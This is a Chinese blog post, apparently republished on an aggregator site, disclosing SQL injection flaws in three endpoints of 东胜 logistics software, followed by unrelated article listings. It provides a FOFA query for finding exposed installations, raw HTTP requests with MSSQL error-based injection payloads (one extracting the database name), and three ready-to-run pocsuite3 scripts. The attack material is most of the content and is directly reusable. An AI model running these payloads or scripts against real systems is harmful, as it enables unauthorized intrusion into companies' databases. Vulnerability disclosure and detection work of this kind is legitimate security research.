某胜物流软件三个接口sql注入漏洞(附漏洞检测脚本)

news2024/9/20 15:01:40

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

东胜物流软件三个接口存在SQL注入漏洞

fofa语句

body="CompanysAdapter.aspx"

poc加检测

GetDataList接口

GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=DrvCode%20like%20%27%1%%27%20and%20DrvName%20like%20%27%1%%27%20and%20JzNo%20like%20%27%1%%27%20and%20OrgCode%20like%20%27%1%%27%20AND%204045%20IN%20(select%20sys.fn_sqlvarbasetostr(hashbytes(%27MD5%27,%275%27)))--%20IkbK&page=1 HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

TCodeVoynoAdapter.aspx接口

GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+substring%28sys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%275%27%29%29%2C3%2C32%29%3E0%3B-- HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0

SaveUserQuerySetting接口

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: 
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}

poc脚本

脚本使用pocsuite框架

GetDataList接口

# _*_ coding:utf-8 _*_
# @Time : 2024/2/23
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class dongsheng_getdatalist_sql(POCBase):
    pocDesc = '''东胜物流软件-GetDataList接口SQL注入漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-2-23'
    name = '东胜物流软件-GetDataList接口SQL注入漏洞'
    #body="CompanysAdapter.aspx"


    def _verify(self):

        result = {}
        url = self.url+ '/TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=DrvCode%20like%20%27%1%%27%20and%20DrvName%20like%20%27%1%%27%20and%20JzNo%20like%20%27%1%%27%20and%20OrgCode%20like%20%27%1%%27%20AND%204045%20IN%20(select%20sys.fn_sqlvarbasetostr(hashbytes(%27MD5%27,%275%27)))--%20IkbK&page=1'

        headers = {
            "User-Agent": "Mozilla/5.0"
        }

        try:

            response = requests.get(url, headers=headers)
            if response.status_code == 500 and 'e4da3b7fbbce2345d7772b0674a318d5' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(dongsheng_getdatalist_sql)

TCodeVoynoAdapter.aspx接口

# _*_ coding:utf-8 _*_
# @Time : 2024/2/23
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class dongsheng_tcodevoynoadapter_sql(POCBase):
    pocDesc = '''东胜物流软件-TCodeVoynoAdapter.aspx接口SQL注入漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-2-23'
    name = '东胜物流软件-TCodeVoynoAdapter.aspx接口SQL注入漏洞'
    #body="CompanysAdapter.aspx"


    def _verify(self):

        result = {}
        url = self.url+ '/FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+substring%28sys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%275%27%29%29%2C3%2C32%29%3E0%3B--'

        headers = {
            "User-Agent": "Mozilla/5.0"
        }

        try:

            response = requests.get(url, headers=headers)
            if response.status_code == 500 and 'e4da3b7fbbce2345d7772b0674a318d5' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(dongsheng_tcodevoynoadapter_sql)

SaveUserQuerySetting接口

# _*_ coding:utf-8 _*_
# @Time : 2024/2/23
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class dongsheng_saveuserquerysetting_sql(POCBase):
    pocDesc = '''东胜物流软件-SaveUserQuerySetting接口SQL注入漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-2-23'
    name = '东胜物流软件-SaveUserQuerySetting接口SQL注入漏洞'
    #body="CompanysAdapter.aspx"


    def _verify(self):

        result = {}
        url = self.url+ '/MvcShipping/MsBaseInfo/SaveUserQuerySetting'

        headers = {
            "User-Agent": "Mozilla/5.0",
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Accept-Encoding': 'gzip'
        }

        try:
            data="formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}"
            response = requests.post(url, headers=headers, data=data)
            if response.status_code == 200 and 'qxpqq' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(dongsheng_saveuserquerysetting_sql)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1464998.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

云呐矿井智能化运维工是什么?智能机器人运维岗位

云呐矿井智能化运维工是什么?智能机器人运维岗位

煤矿智能运维是指利用先进的信息技术和自动控制,在煤矿生产过程中对煤矿设备进行监测、维护和管理。其职责和工作任务主要包括: 工作环境:  面对复杂的地质条件和极端的气候环境,煤矿智能运维工程师往往需要在地下煤矿、监测中心等环境中工作。因此&a…
阅读更多...
2024年【陕西省安全员C证】模拟考试题库及陕西省安全员C证操作证考试

2024年【陕西省安全员C证】模拟考试题库及陕西省安全员C证操作证考试

题库来源:安全生产模拟考试一点通公众号小程序 陕西省安全员C证模拟考试题库考前必练!安全生产模拟考试一点通每个月更新陕西省安全员C证操作证考试题目及答案!多做几遍,其实通过陕西省安全员C证模拟考试题库很简单。 1、【多选题…
阅读更多...
TS04——四通道灵敏度自校准电容触摸控制电路,可通过外部电容可独立调节灵敏率和外部电阻调节内部频率,广泛应用于移动设备,门钥匙锁矩阵的应用

TS04——四通道灵敏度自校准电容触摸控制电路,可通过外部电容可独立调节灵敏率和外部电阻调节内部频率,广泛应用于移动设备,门钥匙锁矩阵的应用

TS04是一块四通道灵敏度自校准电容触摸控制电路。 主要特点: ● 灵敏度 自动校准的电容触摸电路 ● 并行接口 ● 通过外部电容可独立调节灵敏率 ● 通过外部电阻调节内部频率 ● 嵌入高频的噪音消除电路 ● 电流工作小 ● 封装形式: SOP14、 16QFN 应用&#xff1a…
阅读更多...
关于在分布式环境中RVN和使用场景的介绍4

关于在分布式环境中RVN和使用场景的介绍4

简介 在前面的文档中,我们介绍了RVN的概念,通过RVN可以解决的某类问题和使用技巧,以及处理RVN的逻辑的具体实现。在本文中,我们将要介绍关于如何使用RVN解决另一种在分布式系统中常出现的问题。 问题 假设我们创建了一个servic…
阅读更多...
注意考场细节 多拿十分不香吗?

注意考场细节 多拿十分不香吗?

专转本考试是专科毕业生继续升学的“本科通道”,也是千千万万专科学子的第二次高考。若是因为一些细节问题,而耽误了考试,那真的很得不偿失。 1.待发卷时应该做些什么? 提早15分钟进入考场,看一看教室四周,熟悉-下陌生…
阅读更多...
《剑指Offer》笔记题解思路技巧优化_Part_6

《剑指Offer》笔记题解思路技巧优化_Part_6

《剑指Offer》笔记&题解&思路&技巧&优化_Part_6 😍😍😍 相知🙌🙌🙌 相识😢😢😢 开始刷题🟡1.LCR 168. 丑数—— 丑数🟢2. LCR 16…
阅读更多...
Vue样式绑定

Vue样式绑定

1. 绑定 HTML class ①通过class名称的bool值判断样式是否被启用 <template><!--通过样式名称是否显示控制样式--><div :class"{ haveBorder: p.isBorder, haveBackground-color: p.isBackgroundcolor }">此处是样式展示区域</div><br /…
阅读更多...
小猫咪不喝水怎么办?主食冻干、主食罐头喂养远离缺水小猫

小猫咪不喝水怎么办?主食冻干、主食罐头喂养远离缺水小猫

小猫咪不喝水怎么办&#xff1f;是否可以忽视它不喝水&#xff1f;它们会不会在口渴、缺水的时候自动去找水喝呢&#xff1f;猫的祖先是来自沙漠的猫科动物&#xff0c;在沙漠中生存时几乎找不到水源&#xff0c;因此它们进化出了“低渴感”&#xff0c;同时它们的肾脏也具备了…
阅读更多...
EventStream获得数据流,前端配置获得推送的流

EventStream获得数据流,前端配置获得推送的流

如上图所示&#xff0c;请求一个接口&#xff0c;接口以数据流的方式向客户端推送数据&#xff0c;默认需要消息收集一条&#xff0c;在原来的基础上追加&#xff0c;在create-react-app生成的工程中&#xff0c;如果代理使用了中间件http-proxy-middleware&#xff0c;同时dev…
阅读更多...
openai sora 只能根据文本生成视频?不,TA 是通用物理世界模拟器

openai sora 只能根据文本生成视频?不,TA 是通用物理世界模拟器

视频生成模型作为世界模拟器 我们探索了在视频数据上进行大规模生成模型的训练。 具体来说&#xff0c;我们联合在可变持续时间、分辨率和长宽比的视频和图像上训练文本条件扩散模型。 我们利用了一个在视频和图像潜在编码的时空补丁上操作的变压器架构。 我们最大的模型So…
阅读更多...
Qt_纯虚函数的信号和槽

Qt_纯虚函数的信号和槽

简介 在C中&#xff0c;纯虚函数是一个在基类中声明但没有实现的虚函数。纯虚函数的声明以 “ 0” 结尾。纯虚函数的目的是为了提供一个接口&#xff0c;但是不提供实现。派生类必须实现纯虚函数&#xff0c;否则它也会成为一个抽象类。纯虚函数可以在基类中定义&#xff0c;也…
阅读更多...
PNPM 批量检查和更新项目依赖

PNPM 批量检查和更新项目依赖

&#x1f680; 作者主页&#xff1a; 有来技术 &#x1f525; 开源项目&#xff1a; youlai-mall &#x1f343; vue3-element-admin &#x1f343; youlai-boot &#x1f33a; 仓库主页&#xff1a; Gitee &#x1f4ab; Github &#x1f4ab; GitCode &#x1f496; 欢迎点赞…
阅读更多...
代码随想录算法训练营第59天 | 583.两个字符串的删除操作 72.编辑距离

代码随想录算法训练营第59天 | 583.两个字符串的删除操作 72.编辑距离

两个字符串的删除操作 dp[i][j] 表示使得[0, i-1]的word1子串和[0, j-1]的word2子串相同所需要的最小步数。 递推公式&#xff1a;也是分为word1[i-1]和word2[j-1]相不相等两种情况。如果相等则不需要修改&#xff0c;dp[i][j] dp[i - 1][j - 1]。如果不相等&#xff0c;要么删…
阅读更多...
李一舟的AI人工智能课程全部内容

李一舟的AI人工智能课程全部内容

科技一直都在进步&#xff0c;我们唯一能做的就是只能让自己不断地学习&#xff0c;保持终身学习&#xff0c;否则时代抛弃你&#xff0c;连招呼都不会打一个。 分享一下最近很火的某老师的AI人工智能课程及工具&#xff0c;希望对你的人工智能学习有所帮助 课程的内容网盘链接…
阅读更多...
酷开科技丨新年新玩法!酷开系统壁纸模式给客厅“换”新

酷开科技丨新年新玩法!酷开系统壁纸模式给客厅“换”新

甲辰龙年即将到来&#xff0c;新年新家新气象&#xff0c;快到酷开系统壁纸模式中挑选一款喜欢的壁纸&#xff0c;为新的一年增添一份美好和喜悦吧&#xff01; 酷开科技将更多的电视新玩法带给你&#xff0c;让你的电视成为家庭中的焦点&#xff01;酷开系统壁纸模式&#xf…
阅读更多...
在SAP生产系统里面快速地紧急修复BUG修改代码

在SAP生产系统里面快速地紧急修复BUG修改代码

在SAP生产系统里面快速地紧急修复BUG修改代码
阅读更多...
RENISHAW雷尼绍双读数头系统应用分享

RENISHAW雷尼绍双读数头系统应用分享

在精密回转运动控制中&#xff0c;大多数场合都会对系统的回转定位精度有严格的要求&#xff0c;RENISHAW雷尼绍圆光栅系统&#xff08;RESM增量和RESA绝对值&#xff09;对于回转角度的反馈测量方案能有效的解决运动控制对回转精度的需求。但是配置单个读数头的圆光栅系统的精…
阅读更多...
flutter sliver 多种滚动组合开发指南

flutter sliver 多种滚动组合开发指南

flutter sliver 多种滚动组合开发指南 视频 https://youtu.be/4mho1kZ_YQU https://www.bilibili.com/video/BV1WW4y1d7ZC/ 前言 有不少同学工作中遇到需要把几个不同滚动行为组件&#xff08;顶部 appBar、内容固定块、tabBar 切换、tabBarView视图、自适应高度、横向滚动&a…
阅读更多...
PostgreSQL 实体化视图的使用

PostgreSQL 实体化视图的使用

上周的教程中&#xff0c;通过 DVD Rental Database 示例&#xff0c;让我们了解了在 PostgreSQL 中创建实体化视图的过程。正如我们所了解的&#xff0c;PostgreSQL 实体化视图提供了一种强大的机制&#xff0c;通过预计算和存储查询结果集为物理表来提高查询性能。接下来的内…
阅读更多...
广州市轻工技师学院领导一行莅临泰迪智能科技开展“访企拓岗”活动

广州市轻工技师学院领导一行莅临泰迪智能科技开展“访企拓岗”活动

2月21日&#xff0c;广州市轻工技师学院技能鉴定处副主任王永润、信息技术产业系副主任邝嘉伟及信息技术产业系骨干教师等一行莅临广东泰迪智能科技股份有限公司产教融合实训基地就深入“访企拓岗”、强化校企合作、促进毕业生充分就业、创新人才培养范式等领域进行了深入交流。…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023